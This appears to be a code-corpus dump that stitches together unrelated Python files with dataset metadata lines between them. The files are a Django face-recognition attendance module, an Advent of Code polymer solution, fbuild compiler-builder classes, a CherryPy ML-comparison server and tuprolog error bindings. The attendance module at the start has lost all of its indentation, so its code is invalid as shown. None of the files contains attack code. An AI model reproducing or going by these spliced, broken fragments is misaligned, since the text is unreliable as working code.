x_face_locations=face_recognition.face_locations(face_aligned)
faces_encodings=face_recognition.face_encodings(face_aligned,known_face_locations=x_face_locations)
if(len(faces_encodings)==0):
return ([-1],[0])
except:
return ([-1],[0])
prob=svc.predict_proba(faces_encodings)
result=np.where(prob[0]==np.amax(prob[0]))
if(prob[0][result[0]]<=threshold):
return ([-1],prob[0][result[0]])
return (result[0],prob[0][result[0]])
def vizualize_Data(embedded, targets,):
X_embedded = TSNE(n_components=2).fit_transform(embedded)
for i, t in enumerate(set(targets)):
idx = targets == t
plt.scatter(X_embedded[idx, 0], X_embedded[idx, 1], label=t)
plt.legend(bbox_to_anchor=(1, 1));
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
plt.savefig('./recognition/static/recognition/img/training_visualisation.png')
plt.close()
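# Ensures a Present row exists for today for every known person (marking those
# who were detected as present) and logs an "in" Time entry for each detection.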
def update_attendance_in_db_in(present):
today=datetime.date.today()
time=datetime.datetime.now()
for person in present:
user=User.objects.get(username=person)
try:
qs=Present.objects.get(user=user,date=today)
except :
qs= None
if qs is None:
if present[person]==True:
a=Present(user=user,date=today,present=True)
a.save()
else:
a=Present(user=user,date=today,present=False)
a.save()
else:
if present[person]==True:
qs.present=True
qs.save(update_fields=['present'])
if present[person]==True:
a=Time(user=user,date=today,time=time, out=False)
a.save()
def update_attendance_in_db_out(present):
today=datetime.date.today()
time=datetime.datetime.now()
for person in present:
user=User.objects.get(username=person)
if present[person]==True:
a=Time(user=user,date=today,time=time, out=True)
a.save()
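# Validates one day's sequence of in/out punches and totals the break time:
# returns (False, 0) when the sequence is malformed (starts with an "out",
# the in/out counts differ, or two punches of the same kind occur in a row),
# otherwise (True, hours spent between each "out" punch and the following "in").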
def check_validity_times(times_all):
if(len(times_all)>0):
sign=times_all.first().out
else:
sign=True
times_in=times_all.filter(out=False)
times_out=times_all.filter(out=True)
if(len(times_in)!=len(times_out)):
sign=True
break_hourss=0
if(sign==True):
check=False
break_hourss=0
return (check,break_hourss)
prev=True
prev_time=times_all.first().time
for obj in times_all:
curr=obj.out
if(curr==prev):
check=False
break_hourss=0
return (check,break_hourss)
if(curr==False):
curr_time=obj.time
to=curr_time
ti=prev_time
break_time=((to-ti).total_seconds())/3600
break_hourss+=break_time
else:
prev_time=obj.time
prev=curr
return (True,break_hourss)
def convert_hours_to_hours_mins(hours):
h=int(hours)
hours-=h
m=hours*60
m=math.ceil(m)
return str(str(h)+ " hrs " + str(m) + " mins")
#used
def hours_vs_date_given_employee(present_qs,time_qs,admin=True):
register_matplotlib_converters()
df_hours=[]
df_break_hours=[]
qs=present_qs
for obj in qs:
date=obj.date
times_in=time_qs.filter(date=date).filter(out=False).order_by('time')
times_out=time_qs.filter(date=date).filter(out=True).order_by('time')
times_all=time_qs.filter(date=date).order_by('time')
obj.time_in=None
obj.time_out=None
obj.hours=0
obj.break_hours=0
if (len(times_in)>0):
obj.time_in=times_in.first().time
if (len(times_out)>0):
obj.time_out=times_out.last().time
if(obj.time_in is not None and obj.time_out is not None):
ti=obj.time_in
to=obj.time_out
hours=((to-ti).total_seconds())/3600
obj.hours=hours
else:
obj.hours=0
(check,break_hourss)= check_validity_times(times_all)
if check:
obj.break_hours=break_hourss
else:
obj.break_hours=0
df_hours.append(obj.hours)
df_break_hours.append(obj.break_hours)
obj.hours=convert_hours_to_hours_mins(obj.hours)
obj.break_hours=convert_hours_to_hours_mins(obj.break_hours)
df = read_frame(qs)
df["hours"]=df_hours
df["break_hours"]=df_break_hours
print(df)
sns.barplot(data=df,x='date',y='hours')
plt.xticks(rotation='vertical')
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
if(admin):
plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_date/1.png')
plt.close()
else:
plt.savefig('./recognition/static/recognition/img/attendance_graphs/employee_login/1.png')
plt.close()
return qs
#used
def hours_vs_employee_given_date(present_qs,time_qs):
register_matplotlib_converters()
df_hours=[]
df_break_hours=[]
df_username=[]
qs=present_qs
for obj in qs:
user=obj.user
times_in=time_qs.filter(user=user).filter(out=False)
times_out=time_qs.filter(user=user).filter(out=True)
times_all=time_qs.filter(user=user)
obj.time_in=None
obj.time_out=None
obj.hours=0
obj.hours=0
if (len(times_in)>0):
obj.time_in=times_in.first().time
if (len(times_out)>0):
obj.time_out=times_out.last().time
if(obj.time_in is not None and obj.time_out is not None):
ti=obj.time_in
to=obj.time_out
hours=((to-ti).total_seconds())/3600
obj.hours=hours
else:
obj.hours=0
(check,break_hourss)= check_validity_times(times_all)
if check:
obj.break_hours=break_hourss
else:
obj.break_hours=0
df_hours.append(obj.hours)
df_username.append(user.username)
df_break_hours.append(obj.break_hours)
obj.hours=convert_hours_to_hours_mins(obj.hours)
obj.break_hours=convert_hours_to_hours_mins(obj.break_hours)
df = read_frame(qs)
df['hours']=df_hours
df['username']=df_username
df["break_hours"]=df_break_hours
sns.barplot(data=df,x='username',y='hours')
plt.xticks(rotation='vertical')
rcParams.update({'figure.autolayout': True})
plt.tight_layout()
plt.savefig('./recognition/static/recognition/img/attendance_graphs/hours_vs_employee/1.png')
plt.close()
return qs
def total_number_employees():
qs=User.objects.all()
return (len(qs) -1)
# -1 to account for admin
def employees_present_today():
today=datetime.date.today()
qs=Present.objects.filter(date=today).filter(present=True)
return len(qs)
#used
def this_week_emp_count_vs_date():
today=datetime.date.today()
some_day_last_week=today-datetime.timedelta(days=7)
monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1))
monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7)
qs=Present.objects.filter(date__gte=monday_of_this_week).filter(date__lte=today)
str_dates=[]
emp_count=[]
str_dates_all=[]
emp_cnt_all=[]
cnt=0
for obj in qs:
date=obj.date
str_dates.append(str(date))
qs=Present.objects.filter(date=date).filter(present=True)
emp_count.append(len(qs))
while(cnt<5):
date=str(monday_of_this_week+datetime.timedelta(days=cnt))
cnt+=1
str_dates_all.append(date)
if(str_dates.count(date))>0:
idx=str_dates.index(date)
emp_cnt_all.append(emp_count[idx])
else:
emp_cnt_all.append(0)
df=pd.DataFrame()
df["date"]=str_dates_all
df["Number of employees"]=emp_cnt_all
sns.lineplot(data=df,x='date',y='Number of employees')
plt.savefig('./recognition/static/recognition/img/attendance_graphs/this_week/1.png')
plt.close()
#used
def last_week_emp_count_vs_date():
today=datetime.date.today()
some_day_last_week=today-datetime.timedelta(days=7)
monday_of_last_week=some_day_last_week- datetime.timedelta(days=(some_day_last_week.isocalendar()[2] - 1))
monday_of_this_week = monday_of_last_week + datetime.timedelta(days=7)
qs=Present.objects.filter(date__gte=monday_of_last_week).filter(date__lt=monday_of_this_week)
str_dates=[]
emp_count=[]
str_dates_all=[]
emp_cnt_all=[]
cnt=0
for obj in qs:
date=obj.date
str_dates.append(str(date))
qs=Present.objects.filter(date=date).filter(present=True)
emp_count.append(len(qs))
while(cnt<5):
date=str(monday_of_last_week+datetime.timedelta(days=cnt))
cnt+=1
str_dates_all.append(date)
if(str_dates.count(date))>0:
idx=str_dates.index(date)
emp_cnt_all.append(emp_count[idx])
else:
emp_cnt_all.append(0)
df=pd.DataFrame()
df["date"]=str_dates_all
df["emp_count"]=emp_cnt_all
sns.lineplot(data=df,x='date',y='emp_count')
plt.savefig('./recognition/static/recognition/img/attendance_graphs/last_week/1.png')
plt.close()
# Create your views here.
def home(request):
return render(request, 'recognition/home.html')
@login_required
def dashboard(request):
if(request.user.username=='admin'):
print("admin")
return render(request, 'recognition/admin_dashboard.html')
else:
print("not admin")
return render(request,'recognition/employee_dashboard.html')
@login_required
def add_photos(request):
if request.user.username!='admin':
return redirect('not-authorised')
if request.method=='POST':
form=usernameForm(request.POST)
data = request.POST.copy()
username=data.get('username')
if username_present(username):
create_dataset(username)
messages.success(request, f'Dataset Created')
return redirect('add-photos')
else:
messages.warning(request, f'No such username found. Please register employee first.')
return redirect('dashboard')
else:
form=usernameForm()
return render(request,'recognition/add_photos.html', {'form' : form})
def mark_your_attendance(request):
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'rb') as f:
svc = pickle.load(f)
fa = FaceAligner(predictor , desiredFaceWidth = 96)
encoder=LabelEncoder()
encoder.classes_ = np.load('face_recognition_data/classes.npy')
faces_encodings = np.zeros((1,128))
no_of_faces = len(svc.predict_proba(faces_encodings)[0])
count = dict()
present = dict()
log_time = dict()
start = dict()
for i in range(no_of_faces):
count[encoder.inverse_transform([i])[0]] = 0
present[encoder.inverse_transform([i])[0]] = False
vs = VideoStream(src=0).start()
sampleNum = 0
while(True):
frame = vs.read()
frame = imutils.resize(frame ,width = 800)
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector(gray_frame,0)
for face in faces:
print("INFO : inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
(pred,prob)=predict(face_aligned,svc)
if(pred!=[-1]):
person_name=encoder.inverse_transform(np.ravel([pred]))[0]
pred=person_name
if count[pred] == 0:
start[pred] = time.time()
count[pred] = count.get(pred,0) + 1
if count[pred] == 4 and (time.time()-start[pred]) > 1.2:
count[pred] = 0
else:
#if count[pred] == 4 and (time.time()-start) <= 1.5:
present[pred] = True
log_time[pred] = datetime.datetime.now()
count[pred] = count.get(pred,0) + 1
print(pred, present[pred], count[pred])
cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
else:
person_name="unknown"
cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
#cv2.putText()
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
#cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Mark Attendance - In - Press q to exit",frame)
		#Before closing it we need to give a wait command, otherwise the open cv won't work
# @params with the millisecond of delay 1
#cv2.waitKey(1)
#To get out of the loop
key=cv2.waitKey(50) & 0xFF
if(key==ord("q")):
break
	#Stopping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
update_attendance_in_db_in(present)
return redirect('home')
def mark_your_attendance_out(request):
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('face_recognition_data/shape_predictor_68_face_landmarks.dat') #Add path to the shape predictor ######CHANGE TO RELATIVE PATH LATER
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'rb') as f:
svc = pickle.load(f)
fa = FaceAligner(predictor , desiredFaceWidth = 96)
encoder=LabelEncoder()
encoder.classes_ = np.load('face_recognition_data/classes.npy')
faces_encodings = np.zeros((1,128))
no_of_faces = len(svc.predict_proba(faces_encodings)[0])
count = dict()
present = dict()
log_time = dict()
start = dict()
for i in range(no_of_faces):
count[encoder.inverse_transform([i])[0]] = 0
present[encoder.inverse_transform([i])[0]] = False
vs = VideoStream(src=0).start()
sampleNum = 0
while(True):
frame = vs.read()
frame = imutils.resize(frame ,width = 800)
gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector(gray_frame,0)
for face in faces:
print("INFO : inside for loop")
(x,y,w,h) = face_utils.rect_to_bb(face)
face_aligned = fa.align(frame,gray_frame,face)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)
(pred,prob)=predict(face_aligned,svc)
if(pred!=[-1]):
person_name=encoder.inverse_transform(np.ravel([pred]))[0]
pred=person_name
if count[pred] == 0:
start[pred] = time.time()
count[pred] = count.get(pred,0) + 1
if count[pred] == 4 and (time.time()-start[pred]) > 1.5:
count[pred] = 0
else:
#if count[pred] == 4 and (time.time()-start) <= 1.5:
present[pred] = True
log_time[pred] = datetime.datetime.now()
count[pred] = count.get(pred,0) + 1
print(pred, present[pred], count[pred])
cv2.putText(frame, str(person_name)+ str(prob), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
else:
person_name="unknown"
cv2.putText(frame, str(person_name), (x+6,y+h-6), cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,255,0),1)
#cv2.putText()
# Before continuing to the next loop, I want to give it a little pause
# waitKey of 100 millisecond
#cv2.waitKey(50)
#Showing the image in another window
#Creates a window with window name "Face" and with the image img
cv2.imshow("Mark Attendance- Out - Press q to exit",frame)
		#Before closing it we need to give a wait command, otherwise the open cv won't work
# @params with the millisecond of delay 1
#cv2.waitKey(1)
#To get out of the loop
key=cv2.waitKey(50) & 0xFF
if(key==ord("q")):
break
	#Stopping the videostream
vs.stop()
# destroying all the windows
cv2.destroyAllWindows()
update_attendance_in_db_out(present)
return redirect('home')
@login_required
def train(request):
if request.user.username!='admin':
return redirect('not-authorised')
training_dir='face_recognition_data/training_dataset'
count=0
for person_name in os.listdir(training_dir):
curr_directory=os.path.join(training_dir,person_name)
if not os.path.isdir(curr_directory):
continue
for imagefile in image_files_in_folder(curr_directory):
count+=1
X=[]
y=[]
i=0
for person_name in os.listdir(training_dir):
print(str(person_name))
curr_directory=os.path.join(training_dir,person_name)
if not os.path.isdir(curr_directory):
continue
for imagefile in image_files_in_folder(curr_directory):
print(str(imagefile))
image=cv2.imread(imagefile)
try:
X.append((face_recognition.face_encodings(image)[0]).tolist())
y.append(person_name)
i+=1
except:
print("removed")
os.remove(imagefile)
targets=np.array(y)
encoder = LabelEncoder()
encoder.fit(y)
y=encoder.transform(y)
X1=np.array(X)
print("shape: "+ str(X1.shape))
np.save('face_recognition_data/classes.npy', encoder.classes_)
svc = SVC(kernel='linear',probability=True)
svc.fit(X1,y)
svc_save_path="face_recognition_data/svc.sav"
with open(svc_save_path, 'wb') as f:
pickle.dump(svc,f)
vizualize_Data(X1,targets)
messages.success(request, f'Training Complete.')
return render(request,"recognition/train.html")
@login_required
def not_authorised(request):
return render(request,'recognition/not_authorised.html')
@login_required
def view_attendance_home(request):
total_num_of_emp=total_number_employees()
emp_present_today=employees_present_today()
this_week_emp_count_vs_date()
last_week_emp_count_vs_date()
return render(request,"recognition/view_attendance_home.html", {'total_num_of_emp' : total_num_of_emp, 'emp_present_today': emp_present_today})
@login_required
def view_attendance_date(request):
if request.user.username!='admin':
return redirect('not-authorised')
qs=None
time_qs=None
present_qs=None
if request.method=='POST':
form=DateForm(request.POST)
if form.is_valid():
date=form.cleaned_data.get('date')
print("date:"+ str(date))
time_qs=Time.objects.filter(date=date)
present_qs=Present.objects.filter(date=date)
if(len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_employee_given_date(present_qs,time_qs)
return render(request,'recognition/view_attendance_date.html', {'form' : form,'qs' : qs })
else:
messages.warning(request, f'No records for selected date.')
return redirect('view-attendance-date')
else:
form=DateForm()
return render(request,'recognition/view_attendance_date.html', {'form' : form, 'qs' : qs})
@login_required
def view_attendance_employee(request):
if request.user.username!='admin':
return redirect('not-authorised')
time_qs=None
present_qs=None
qs=None
if request.method=='POST':
form=UsernameAndDateForm(request.POST)
if form.is_valid():
username=form.cleaned_data.get('username')
if username_present(username):
u=User.objects.get(username=username)
time_qs=Time.objects.filter(user=u)
present_qs=Present.objects.filter(user=u)
date_from=form.cleaned_data.get('date_from')
date_to=form.cleaned_data.get('date_to')
if date_to < date_from:
messages.warning(request, f'Invalid date selection.')
return redirect('view-attendance-employee')
else:
time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
if (len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_date_given_employee(present_qs,time_qs,admin=True)
return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs})
else:
#print("inside qs is None")
messages.warning(request, f'No records for selected duration.')
return redirect('view-attendance-employee')
else:
print("invalid username")
messages.warning(request, f'No such username found.')
return redirect('view-attendance-employee')
else:
form=UsernameAndDateForm()
return render(request,'recognition/view_attendance_employee.html', {'form' : form, 'qs' :qs})
@login_required
def view_my_attendance_employee_login(request):
if request.user.username=='admin':
return redirect('not-authorised')
qs=None
time_qs=None
present_qs=None
if request.method=='POST':
form=DateForm_2(request.POST)
if form.is_valid():
u=request.user
time_qs=Time.objects.filter(user=u)
present_qs=Present.objects.filter(user=u)
date_from=form.cleaned_data.get('date_from')
date_to=form.cleaned_data.get('date_to')
if date_to < date_from:
messages.warning(request, f'Invalid date selection.')
return redirect('view-my-attendance-employee-login')
else:
time_qs=time_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
present_qs=present_qs.filter(date__gte=date_from).filter(date__lte=date_to).order_by('-date')
if (len(time_qs)>0 or len(present_qs)>0):
qs=hours_vs_date_given_employee(present_qs,time_qs,admin=False)
return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs})
else:
messages.warning(request, f'No records for selected duration.')
return redirect('view-my-attendance-employee-login')
else:
form=DateForm_2()
return render(request,'recognition/view_my_attendance_employee_login.html', {'form' : form, 'qs' :qs}) | 2.171875 | 2 |
2018/05.py | GillesArcas/Advent_of_Code | 0 | 7880 | import re
import string
DATA = '05.txt'
def react(polymer):
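    # Build a single regex of every reacting pair (aA|Aa|bB|Bb|...) and
    # repeatedly delete all matches until the polymer stops shrinking, then
    # return the final length.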
pairs = '|'.join([a + b + '|' + b + a for a, b in zip(string.ascii_lowercase, string.ascii_uppercase)])
length = len(polymer)
while 1:
polymer = re.sub(pairs, '', polymer)
if len(polymer) == length:
return(length)
else:
length = len(polymer)
def code1():
with open(DATA) as f:
polymer = f.readline().strip()
print('1>', react(polymer))
def code2():
with open(DATA) as f:
polymer = f.readline().strip()
minlength = len(polymer)
for c in string.ascii_lowercase:
polymer2 = re.sub(c, '', polymer, flags=re.I)
length = react(polymer2)
if length < minlength:
minlength = length
print('2>', minlength)
code1()
code2()
| 3.265625 | 3 |
lib/fbuild/builders/__init__.py | felix-lang/fbuild | 40 | 7881 | <reponame>felix-lang/fbuild
import abc
import contextlib
import os
import sys
from functools import partial
from itertools import chain
import fbuild
import fbuild.db
import fbuild.path
import fbuild.temp
from . import platform
# ------------------------------------------------------------------------------
class MissingProgram(fbuild.ConfigFailed):
def __init__(self, programs=None):
self.programs = programs
def __str__(self):
if self.programs is None:
return 'cannot find program'
else:
return 'cannot find any of the programs %s' % \
' '.join(repr(str(p)) for p in self.programs)
# ------------------------------------------------------------------------------
@fbuild.db.caches
def find_program(ctx, names, paths=None, *, quieter=0):
"""L{find_program} is a test that searches the paths for one of the
programs in I{name}. If one is found, it is returned. If not, the next
name in the list is searched for."""
if paths is None:
paths = os.environ['PATH'].split(os.pathsep)
# If we're running on windows, we need to append '.exe' to the filenames
# that we're searching for.
if sys.platform == 'win32':
new_names = []
for name in names:
            if \
                not name.endswith('.exe') and \
                not name.endswith('.cmd') and \
                not name.endswith('.bat'):
                new_names.append(name + '.exe')
                new_names.append(name + '.cmd')
                new_names.append(name + '.bat')
            new_names.append(name)
names = new_names
for name in names:
filename = fbuild.path.Path(name)
ctx.logger.check('looking for ' + filename.name, verbose=quieter)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(name)
else:
for path in paths:
filename = fbuild.path.Path(path, name)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(filename)
ctx.logger.failed(verbose=quieter)
raise MissingProgram(names)
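# Usage sketch (the caller context and program names are assumptions, not from
# the original module):
# gcc_path = find_program(ctx, ['gcc', 'cc'])   # first match on PATH, else MissingProgram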
# ------------------------------------------------------------------------------
def check_version(ctx, builder, version_function, *,
requires_version=None,
requires_at_least_version=None,
requires_at_most_version=None):
"""Helper function to simplify checking the version of a builder."""
if any(v is not None for v in (
requires_version,
requires_at_least_version,
requires_at_most_version)):
ctx.logger.check('checking %s version' % builder)
version_str = version_function()
# Convert the version into a tuple
version = []
for i in version_str.split('.'):
try:
version.append(int(i))
except ValueError:
# The subversion isn't a number, so just convert it to a
# string.
version.append(i)
version = tuple(version)
if requires_version is not None and requires_version != version:
msg = 'version %s required; found %s' % (
'.'.join(str(i) for i in requires_version), version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_least_version is not None and \
requires_at_least_version > version:
msg = 'at least version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_least_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_most_version is not None and \
requires_at_most_version < version:
msg = 'at most version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_most_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
ctx.logger.passed(version_str)
# ------------------------------------------------------------------------------
class AbstractCompiler(fbuild.db.PersistentObject):
def __init__(self, *args, src_suffix, **kwargs):
super().__init__(*args, **kwargs)
self.src_suffix = src_suffix
@fbuild.db.cachemethod
def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST:
return self.uncached_compile(src, *args, **kwargs)
@abc.abstractmethod
def uncached_compile(self, src, *args, **kwargs):
pass
@fbuild.db.cachemethod
@platform.auto_platform_options()
def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \
fbuild.db.DSTS:
"""Compile all of the passed in L{srcs} in parallel."""
# When a object has extra external dependencies, such as .c files
# depending on .h changes, depending on library changes, we need to add
# the dependencies in build_objects. Unfortunately, the db doesn't
# know about these new files and so it can't tell when a function
# really needs to be rerun. So, we'll just not cache this function.
# We need to add extra dependencies to our call.
objs = []
src_deps = []
dst_deps = []
for o, s, d in self.ctx.scheduler.map(
partial(self.compile.call, *args, **kwargs),
srcs):
objs.append(o)
src_deps.extend(s)
dst_deps.extend(d)
self.ctx.db.add_external_dependencies_to_call(
srcs=src_deps,
dsts=dst_deps)
return objs
# --------------------------------------------------------------------------
def tempfile(self, code):
return fbuild.temp.tempfile(code, self.src_suffix)
@contextlib.contextmanager
def tempfile_compile(self, code='', *, quieter=1, **kwargs):
with self.tempfile(code) as src:
yield self.uncached_compile(src, quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_compile(self, *args, **kwargs):
try:
with self.tempfile_compile(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_compile(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_compile(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractLibLinker(AbstractCompiler):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_lib(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into a library and caches the results."""
return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_lib(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into a library."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_lib(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs)
def try_link_lib(self, *args, **kwargs):
try:
with self.tempfile_link_lib(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
def check_link_lib(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_lib(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractRunner(fbuild.db.PersistentObject):
@abc.abstractmethod
def tempfile_run(self, *args, **kwargs):
pass
def try_run(self, code='', quieter=1, **kwargs):
try:
self.tempfile_run(code, quieter=quieter, **kwargs)
except fbuild.ExecutionError:
return False
else:
return True
def check_run(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_run(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractExeLinker(AbstractCompiler, AbstractRunner):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_exe(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into an executable."""
return self.uncached_link_exe(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_exe(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into an executable."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_exe(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_link_exe(self, *args, **kwargs):
try:
with self.tempfile_link_exe(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_link_exe(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_exe(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
@platform.auto_platform_options()
def tempfile_run(self, *args, quieter=1, ckwargs={}, lkwargs={}, **kwargs):
with self.tempfile_link_exe(*args,
quieter=quieter,
ckwargs=ckwargs,
**lkwargs) as exe:
return self.ctx.execute([exe],
quieter=quieter,
cwd=exe.parent,
**kwargs)
# ------------------------------------------------------------------------------
class AbstractCompilerBuilder(AbstractLibLinker, AbstractExeLinker):
pass
| 2.46875 | 2 |
WebServer.py | i3uex/CompareML | 0 | 7882 | import json
import cherrypy
import engine
class WebServer(object):
@cherrypy.expose
def index(self):
return open('public/index.html', encoding='utf-8')
@cherrypy.expose
class GetOptionsService(object):
@cherrypy.tools.accept(media='text/plain')
def GET(self):
return json.dumps({
'providers': engine.get_providers(),
'algorithms': engine.get_algorithms(),
'default_datasets': engine.get_all_default_datasets()
})
@cherrypy.expose
class SetOptionsService(object):
@cherrypy.tools.accept(media='text/plain')
def POST(self, options):
""" Use the options selected by the user to execute all algorithms
:param options: {
is_default_dataset: bool,
dataset: str,
providers: []
algorithms: []
target: str
}
if is_default_dataset is true, dataset will contain the name of the default_dataset"""
options_dic = json.loads(options)
try:
result = engine.execute(options_dic['is_default_dataset'], options_dic['dataset'], options_dic['providers'],
options_dic['algorithms'],
options_dic['target'])
except Exception as exception:
message = f"{str(exception)}"
raise cherrypy.HTTPError(500, message=message)
return result
@cherrypy.expose
@cherrypy.tools.json_out()
class GetDefaultDatasetHeadersService(object):
@cherrypy.tools.accept(media='text/plain')
def GET(self, default_dataset_name):
return {'headers': engine.get_default_dataset_headers(default_dataset_name)}
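# Hedged client sketch (not part of the original file; the mount path and the
# option values are assumptions that depend on the server configuration):
# import json, requests
# options = {'is_default_dataset': True, 'dataset': 'iris',
#            'providers': ['provider_a'], 'algorithms': ['algorithm_a'],
#            'target': 'class'}
# requests.post('http://localhost:8080/set_options',
#               data={'options': json.dumps(options)})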
| 2.609375 | 3 |
tuprolog/solve/exception/error/existence/__init__.py | DavideEva/2ppy | 1 | 7883 | from typing import Union
from tuprolog import logger
# noinspection PyUnresolvedReferences
import jpype.imports
# noinspection PyUnresolvedReferences
import it.unibo.tuprolog.solve.exception.error as errors
from tuprolog.core import Term, Atom
from tuprolog.solve import ExecutionContext, Signature
ExistenceError = errors.ExistenceError
ObjectType = ExistenceError.ObjectType
OBJECT_PROCEDURE = ObjectType.PROCEDURE
OBJECT_SOURCE_SINK = ObjectType.SOURCE_SINK
OBJECT_RESOURCE = ObjectType.RESOURCE
OBJECT_STREAM = ObjectType.STREAM
OBJECT_OOP_ALIAS = ObjectType.OOP_ALIAS
OBJECT_OOP_METHOD = ObjectType.OOP_METHOD
OBJECT_OOP_CONSTRUCTOR = ObjectType.OOP_CONSTRUCTOR
OBJECT_OOP_PROPERTY = ObjectType.OOP_PROPERTY
def existence_error(
context: ExecutionContext,
type: ObjectType,
culprit: Term,
message: str
) -> ExistenceError:
return ExistenceError.of(context, type, culprit, message)
def existence_error_for_source_sink(
context: ExecutionContext,
alias: Union[Atom, str]
) -> ExistenceError:
return ExistenceError.forSourceSink(context, alias)
def existence_error_for_procedure(
context: ExecutionContext,
procedure: Signature
) -> ExistenceError:
return ExistenceError.forProcedure(context, procedure)
def existence_error_for_stream(
context: ExecutionContext,
stream: Term
) -> ExistenceError:
return ExistenceError.forStream(context, stream)
def existence_error_for_resource(
context: ExecutionContext,
name: str
) -> ExistenceError:
return ExistenceError.forResource(context, name)
def object_type(name: Union[str, Term]) -> ObjectType:
if isinstance(name, str):
return ObjectType.of(name)
else:
return ObjectType.fromTerm(name)
logger.debug("Loaded JVM classes from it.unibo.tuprolog.solve.exception.error.ExistenceError.*")
| 2.046875 | 2 |
